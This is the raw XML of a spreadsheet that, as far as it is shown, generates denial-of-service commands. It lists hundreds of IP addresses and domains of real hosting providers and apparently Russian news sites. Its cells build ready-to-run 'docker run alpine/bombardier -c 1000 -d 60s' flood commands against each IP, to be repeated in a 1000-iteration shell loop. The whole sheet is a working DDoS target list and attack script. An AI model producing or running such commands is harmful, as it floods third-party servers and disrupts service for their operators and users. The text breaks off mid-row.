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Вад\Desktop\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{86A29B62-B0FE-4269-B46D-DE426896588F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definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">Sheet1!$A$2:$C$2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9" i="1" l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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="376" uniqueCount="265">
  <si>
    <t xml:space="preserve">for i in {1..1000}; do </t>
  </si>
  <si>
    <t>done</t>
  </si>
  <si>
    <t>62.122.170.171</t>
  </si>
  <si>
    <t>64.190.63.111</t>
  </si>
  <si>
    <t>91.195.240.126</t>
  </si>
  <si>
    <t>185.129.100.112</t>
  </si>
  <si>
    <t>109.70.26.37</t>
  </si>
  <si>
    <t>nic.ru</t>
  </si>
  <si>
    <t>15.197.142.173</t>
  </si>
  <si>
    <t>reg.ru</t>
  </si>
  <si>
    <t>52.50.65.32</t>
  </si>
  <si>
    <t>amazonaws.com</t>
  </si>
  <si>
    <t>beget.com</t>
  </si>
  <si>
    <t>194.58.112.174</t>
  </si>
  <si>
    <t>185.215.4.10</t>
  </si>
  <si>
    <t>89.111.167.3</t>
  </si>
  <si>
    <t>87.236.16.206</t>
  </si>
  <si>
    <t>31.31.205.163</t>
  </si>
  <si>
    <t>13.248.216.40</t>
  </si>
  <si>
    <t>35.186.238.101</t>
  </si>
  <si>
    <t>75.2.111.214</t>
  </si>
  <si>
    <t>serverel.net</t>
  </si>
  <si>
    <t>34.102.136.180</t>
  </si>
  <si>
    <t>googleusercontent.com</t>
  </si>
  <si>
    <t>awsglobalaccelerator.com</t>
  </si>
  <si>
    <t>72.52.179.175</t>
  </si>
  <si>
    <t>timeweb.ru</t>
  </si>
  <si>
    <t>ddos-guard.net</t>
  </si>
  <si>
    <t>masterhost.ru</t>
  </si>
  <si>
    <t>r01.ru</t>
  </si>
  <si>
    <t>your-server.de</t>
  </si>
  <si>
    <t>178.210.92.7</t>
  </si>
  <si>
    <t>ihc.ru</t>
  </si>
  <si>
    <t>regruhosting.ru</t>
  </si>
  <si>
    <t>rfn.ru</t>
  </si>
  <si>
    <t>regrucolo.ru</t>
  </si>
  <si>
    <t>80.247.32.209</t>
  </si>
  <si>
    <t>80.247.32.206</t>
  </si>
  <si>
    <t>parklogic.com</t>
  </si>
  <si>
    <t>64.190.63.136</t>
  </si>
  <si>
    <t>192.64.119.130</t>
  </si>
  <si>
    <t>162.255.119.192</t>
  </si>
  <si>
    <t>141.8.226.59</t>
  </si>
  <si>
    <t>52.128.23.153</t>
  </si>
  <si>
    <t>77.88.21.249</t>
  </si>
  <si>
    <t>186.2.170.100</t>
  </si>
  <si>
    <t>185.178.208.177</t>
  </si>
  <si>
    <t>185.129.100.200</t>
  </si>
  <si>
    <t>104.152.168.44</t>
  </si>
  <si>
    <t>hostwhitelabel.com</t>
  </si>
  <si>
    <t>yandex.net</t>
  </si>
  <si>
    <t>18.119.154.66</t>
  </si>
  <si>
    <t>217.160.231.108</t>
  </si>
  <si>
    <t>clienthosting.eu</t>
  </si>
  <si>
    <t>212.12.76.9</t>
  </si>
  <si>
    <t>ptvr.ru</t>
  </si>
  <si>
    <t>185.148.38.70</t>
  </si>
  <si>
    <t>rx.ru</t>
  </si>
  <si>
    <t>185.4.66.100</t>
  </si>
  <si>
    <t>37.130.197.1</t>
  </si>
  <si>
    <t>zilore.net</t>
  </si>
  <si>
    <t>37.130.196.1</t>
  </si>
  <si>
    <t>31.31.196.245</t>
  </si>
  <si>
    <t>5.178.80.46</t>
  </si>
  <si>
    <t>otr-online.ru</t>
  </si>
  <si>
    <t>5.178.80.44</t>
  </si>
  <si>
    <t>193.107.238.105</t>
  </si>
  <si>
    <t>netangels.ru</t>
  </si>
  <si>
    <t>193.107.236.161</t>
  </si>
  <si>
    <t>193.107.236.3</t>
  </si>
  <si>
    <t>188.226.17.6</t>
  </si>
  <si>
    <t>planeta.tc</t>
  </si>
  <si>
    <t>185.93.109.4</t>
  </si>
  <si>
    <t>185.71.67.248</t>
  </si>
  <si>
    <t>185.41.161.253</t>
  </si>
  <si>
    <t>178.248.234.146</t>
  </si>
  <si>
    <t>95.216.70.159</t>
  </si>
  <si>
    <t>blitz.plus</t>
  </si>
  <si>
    <t>91.201.54.56</t>
  </si>
  <si>
    <t>uralpolit.ru</t>
  </si>
  <si>
    <t>91.201.54.2</t>
  </si>
  <si>
    <t>91.201.52.2</t>
  </si>
  <si>
    <t>80.93.176.26</t>
  </si>
  <si>
    <t>h7.modhost.pro</t>
  </si>
  <si>
    <t>77.222.61.195</t>
  </si>
  <si>
    <t>vh224.sweb.ru</t>
  </si>
  <si>
    <t>31.31.198.199</t>
  </si>
  <si>
    <t>213.87.75.167</t>
  </si>
  <si>
    <t>mts.ru</t>
  </si>
  <si>
    <t>195.211.103.223</t>
  </si>
  <si>
    <t>televidoc.ru</t>
  </si>
  <si>
    <t>194.150.215.251</t>
  </si>
  <si>
    <t>galaxydata.ru</t>
  </si>
  <si>
    <t>193.176.76.153</t>
  </si>
  <si>
    <t>185.169.155.14</t>
  </si>
  <si>
    <t>130.193.62.133</t>
  </si>
  <si>
    <t>91.203.80.15</t>
  </si>
  <si>
    <t>web.tmpk.net</t>
  </si>
  <si>
    <t>91.189.114.17</t>
  </si>
  <si>
    <t>217.182.226.187</t>
  </si>
  <si>
    <t>hostiman.com</t>
  </si>
  <si>
    <t>213.159.211.2</t>
  </si>
  <si>
    <t>domainseller.ru</t>
  </si>
  <si>
    <t>210.54.38.201</t>
  </si>
  <si>
    <t>202.108.119.193</t>
  </si>
  <si>
    <t>198.55.101.21</t>
  </si>
  <si>
    <t>webmagic.com</t>
  </si>
  <si>
    <t>195.42.186.46</t>
  </si>
  <si>
    <t>uw.ru</t>
  </si>
  <si>
    <t>195.24.68.5</t>
  </si>
  <si>
    <t>194.87.247.7</t>
  </si>
  <si>
    <t>telekom.ru</t>
  </si>
  <si>
    <t>194.67.106.57</t>
  </si>
  <si>
    <t>194.67.86.61</t>
  </si>
  <si>
    <t>194.67.71.66</t>
  </si>
  <si>
    <t>194.58.112.167</t>
  </si>
  <si>
    <t>194.58.112.165</t>
  </si>
  <si>
    <t>192.185.46.43</t>
  </si>
  <si>
    <t>infoanetech.com</t>
  </si>
  <si>
    <t>185.189.12.114</t>
  </si>
  <si>
    <t>firstbyte.club</t>
  </si>
  <si>
    <t>185.133.42.193</t>
  </si>
  <si>
    <t>beta-glucan.ru</t>
  </si>
  <si>
    <t>185.72.146.142</t>
  </si>
  <si>
    <t>fullspace.ru</t>
  </si>
  <si>
    <t>185.42.12.130</t>
  </si>
  <si>
    <t>multihost.cloud</t>
  </si>
  <si>
    <t>185.22.152.65</t>
  </si>
  <si>
    <t>173.245.59.136</t>
  </si>
  <si>
    <t>cloudflare.com</t>
  </si>
  <si>
    <t>172.67.69.121</t>
  </si>
  <si>
    <t>149.154.71.110</t>
  </si>
  <si>
    <t>nsws.ru</t>
  </si>
  <si>
    <t>141.8.195.125</t>
  </si>
  <si>
    <t>from.sh</t>
  </si>
  <si>
    <t>141.8.192.93</t>
  </si>
  <si>
    <t>134.0.116.160</t>
  </si>
  <si>
    <t>128.14.151.195</t>
  </si>
  <si>
    <t>109.234.153.11</t>
  </si>
  <si>
    <t>104.26.5.80</t>
  </si>
  <si>
    <t>104.26.4.80</t>
  </si>
  <si>
    <t>104.21.77.232</t>
  </si>
  <si>
    <t>104.21.44.27</t>
  </si>
  <si>
    <t>104.21.24.184</t>
  </si>
  <si>
    <t>104.21.10.40</t>
  </si>
  <si>
    <t>95.213.164.227</t>
  </si>
  <si>
    <t>methodlab.ru</t>
  </si>
  <si>
    <t>95.183.8.25</t>
  </si>
  <si>
    <t>91.240.87.136</t>
  </si>
  <si>
    <t>niws.ru</t>
  </si>
  <si>
    <t>91.201.42.98</t>
  </si>
  <si>
    <t>dotnames.ru</t>
  </si>
  <si>
    <t>91.106.207.15</t>
  </si>
  <si>
    <t>91.103.252.108</t>
  </si>
  <si>
    <t>vhoste.ru</t>
  </si>
  <si>
    <t>89.253.223.64</t>
  </si>
  <si>
    <t>tanais.ru</t>
  </si>
  <si>
    <t>87.236.16.239</t>
  </si>
  <si>
    <t>87.236.16.62</t>
  </si>
  <si>
    <t>85.10.192.26</t>
  </si>
  <si>
    <t>81.177.22.153</t>
  </si>
  <si>
    <t>metallibrary.ru</t>
  </si>
  <si>
    <t>78.108.82.37</t>
  </si>
  <si>
    <t>co.uk</t>
  </si>
  <si>
    <t>62.181.46.38</t>
  </si>
  <si>
    <t>misc.qrz.ru</t>
  </si>
  <si>
    <t>62.141.58.43</t>
  </si>
  <si>
    <t>news.de</t>
  </si>
  <si>
    <t>54.201.83.202</t>
  </si>
  <si>
    <t>54.171.226.57</t>
  </si>
  <si>
    <t>46.183.163.233</t>
  </si>
  <si>
    <t>45.130.41.13</t>
  </si>
  <si>
    <t>45.88.202.115</t>
  </si>
  <si>
    <t>45.10.55.152</t>
  </si>
  <si>
    <t>34.149.42.100</t>
  </si>
  <si>
    <t>31.31.198.249</t>
  </si>
  <si>
    <t>5.187.3.119</t>
  </si>
  <si>
    <t>fornex.org</t>
  </si>
  <si>
    <t>5.101.159.26</t>
  </si>
  <si>
    <t>5.101.152.218</t>
  </si>
  <si>
    <t>195.20.49.165</t>
  </si>
  <si>
    <t>192.64.147.227</t>
  </si>
  <si>
    <t>voodoo.com</t>
  </si>
  <si>
    <t>170.33.9.230</t>
  </si>
  <si>
    <t>132.148.47.254</t>
  </si>
  <si>
    <t>isecureserver.net</t>
  </si>
  <si>
    <t>92.53.96.217</t>
  </si>
  <si>
    <t>89.188.115.50</t>
  </si>
  <si>
    <t>2sm.ru</t>
  </si>
  <si>
    <t>87.236.16.135</t>
  </si>
  <si>
    <t>81.19.82.101</t>
  </si>
  <si>
    <t>rambler.ru</t>
  </si>
  <si>
    <t>81.19.82.6</t>
  </si>
  <si>
    <t>81.19.70.4</t>
  </si>
  <si>
    <t>44.230.85.241</t>
  </si>
  <si>
    <t>18.117.34.193</t>
  </si>
  <si>
    <t>193.124.18.105</t>
  </si>
  <si>
    <t>regnim.ru</t>
  </si>
  <si>
    <t>178.248.237.127</t>
  </si>
  <si>
    <t>162.255.119.225</t>
  </si>
  <si>
    <t>104.21.21.140</t>
  </si>
  <si>
    <t>104.21.16.190</t>
  </si>
  <si>
    <t>95.216.28.23</t>
  </si>
  <si>
    <t>hostia.name</t>
  </si>
  <si>
    <t>94.228.123.231</t>
  </si>
  <si>
    <t>tmweb.ru</t>
  </si>
  <si>
    <t>92.62.112.153</t>
  </si>
  <si>
    <t>87.230.36.74</t>
  </si>
  <si>
    <t>psmanaged.com</t>
  </si>
  <si>
    <t>85.233.160.22</t>
  </si>
  <si>
    <t>66.81.199.56</t>
  </si>
  <si>
    <t>62.76.26.118</t>
  </si>
  <si>
    <t>regnum.su</t>
  </si>
  <si>
    <t>51.68.205.22</t>
  </si>
  <si>
    <t>ip-51-68-205.eu</t>
  </si>
  <si>
    <t>37.140.192.76</t>
  </si>
  <si>
    <t>194.67.71.107</t>
  </si>
  <si>
    <t>176.31.179.191</t>
  </si>
  <si>
    <t>dns2.ru-tld.ru</t>
  </si>
  <si>
    <t>172.64.33.112</t>
  </si>
  <si>
    <t>172.64.32.145</t>
  </si>
  <si>
    <t>148.251.70.134</t>
  </si>
  <si>
    <t>107.178.246.46</t>
  </si>
  <si>
    <t>94.228.240.121</t>
  </si>
  <si>
    <t>rosbalt.ru</t>
  </si>
  <si>
    <t>92.53.96.17</t>
  </si>
  <si>
    <t>37.143.11.11</t>
  </si>
  <si>
    <t>207.180.207.179</t>
  </si>
  <si>
    <t>contaboserver.net</t>
  </si>
  <si>
    <t>207.148.248.143</t>
  </si>
  <si>
    <t>195.20.55.247</t>
  </si>
  <si>
    <t>195.20.55.181</t>
  </si>
  <si>
    <t>195.20.50.21</t>
  </si>
  <si>
    <t>185.178.208.45</t>
  </si>
  <si>
    <t>173.249.63.101</t>
  </si>
  <si>
    <t>104.21.60.110</t>
  </si>
  <si>
    <t>104.21.46.56</t>
  </si>
  <si>
    <t>104.21.27.147</t>
  </si>
  <si>
    <t>217.69.139.180</t>
  </si>
  <si>
    <t>mail.ru</t>
  </si>
  <si>
    <t>188.241.116.117</t>
  </si>
  <si>
    <t>cloudns.net</t>
  </si>
  <si>
    <t>186.2.163.112</t>
  </si>
  <si>
    <t>108.59.1.205</t>
  </si>
  <si>
    <t>89.188.109.70</t>
  </si>
  <si>
    <t>cnt.ru</t>
  </si>
  <si>
    <t>85.159.233.17</t>
  </si>
  <si>
    <t>46.165.223.182</t>
  </si>
  <si>
    <t>195.161.62.100</t>
  </si>
  <si>
    <t>188.225.40.162</t>
  </si>
  <si>
    <t>185.32.57.184</t>
  </si>
  <si>
    <t>176.99.13.12</t>
  </si>
  <si>
    <t>176.99.13.11</t>
  </si>
  <si>
    <t>152.32.128.152</t>
  </si>
  <si>
    <t>144.76.167.14</t>
  </si>
  <si>
    <t>h0sting.net</t>
  </si>
  <si>
    <t>94.251.82.138</t>
  </si>
  <si>
    <t>nerz.ru</t>
  </si>
  <si>
    <t>91.226.31.57</t>
  </si>
  <si>
    <t>91.195.240.135</t>
  </si>
  <si>
    <t>91.189.114.24</t>
  </si>
  <si>
    <t>90.189.182.182</t>
  </si>
  <si>
    <t>snt.ru</t>
  </si>
  <si>
    <t>90.156.201.109</t>
  </si>
  <si>
    <t>31.148.96.132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</si>
</sst>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000000-0005-0000-0000-000000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294"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11.25" defaultRowHeight="15.75" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="76.875" customWidth="1"/>
    <col min="2" max="2" width="14.75" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="45.25" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="2" spans="1:3" ht="15" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A2" s="1" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A3" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B3&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 186.2.170.100&amp;&amp; sleep 5;</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>45</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A4" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B4&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.178.208.177&amp;&amp; sleep 5;</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>46</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A5" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B5&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.129.100.200&amp;&amp; sleep 5;</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>47</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A6" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B6&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.152.168.44&amp;&amp; sleep 5;</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A7" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B7&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.88.21.249&amp;&amp; sleep 5;</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>44</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A8" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B8&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 18.119.154.66&amp;&amp; sleep 5;</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>51</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A9" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B9&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.64.119.130&amp;&amp; sleep 5;</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A10" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B10&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 162.255.119.192&amp;&amp; sleep 5;</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>41</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A11" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B11&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.209&amp;&amp; sleep 5;</v>
      </c>
      <c r="B11" s="1" t="s">
        <v>36</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A12" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B12&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.206&amp;&amp; sleep 5;</v>
      </c>
      <c r="B12" s="1" t="s">
        <v>37</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A13" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B13&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 72.52.179.175&amp;&amp; sleep 5;</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>25</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A14" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B14&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.190.63.111&amp;&amp; sleep 5;</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>3</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A15" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B15&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.160.231.108&amp;&amp; sleep 5;</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>52</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="16" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A16" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B16&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.12.76.9&amp;&amp; sleep 5;</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>54</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="17" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A17" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B17&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.215.4.10&amp;&amp; sleep 5;</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>14</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="18" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A18" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B18&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.148.38.70&amp;&amp; sleep 5;</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="19" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A19" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B19&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.4.66.100&amp;&amp; sleep 5;</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>58</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="20" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A20" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B20&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.210.92.7&amp;&amp; sleep 5;</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>31</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="21" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A21" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B21&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 75.2.111.214&amp;&amp; sleep 5;</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="22" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A22" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B22&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.130.197.1&amp;&amp; sleep 5;</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>59</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="23" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A23" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B23&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.130.196.1&amp;&amp; sleep 5;</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>61</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="24" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A24" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B24&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.196.245&amp;&amp; sleep 5;</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>62</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="25" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A25" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B25&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.178.80.46&amp;&amp; sleep 5;</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>63</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="26" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A26" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B26&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.178.80.44&amp;&amp; sleep 5;</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>65</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="27" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A27" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B27&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.107.238.105&amp;&amp; sleep 5;</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>66</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="28" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A28" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B28&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.107.236.161&amp;&amp; sleep 5;</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>68</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="29" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A29" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B29&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.107.236.3&amp;&amp; sleep 5;</v>
      </c>
      <c r="B29" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="30" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A30" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B30&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.226.17.6&amp;&amp; sleep 5;</v>
      </c>
      <c r="B30" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="31" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A31" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B31&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.129.100.112&amp;&amp; sleep 5;</v>
      </c>
      <c r="B31" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="32" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A32" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B32&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.93.109.4&amp;&amp; sleep 5;</v>
      </c>
      <c r="B32" s="1" t="s">
        <v>72</v>
      </c>
      <c r="C32" s="1" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="33" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A33" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B33&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.71.67.248&amp;&amp; sleep 5;</v>
      </c>
      <c r="B33" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C33" s="1" t="s">
        <v>73</v>
      </c>
    </row>
    <row r="34" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A34" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B34&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.41.161.253&amp;&amp; sleep 5;</v>
      </c>
      <c r="B34" s="1" t="s">
        <v>74</v>
      </c>
      <c r="C34" s="1" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="35" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A35" s="1" t="str">
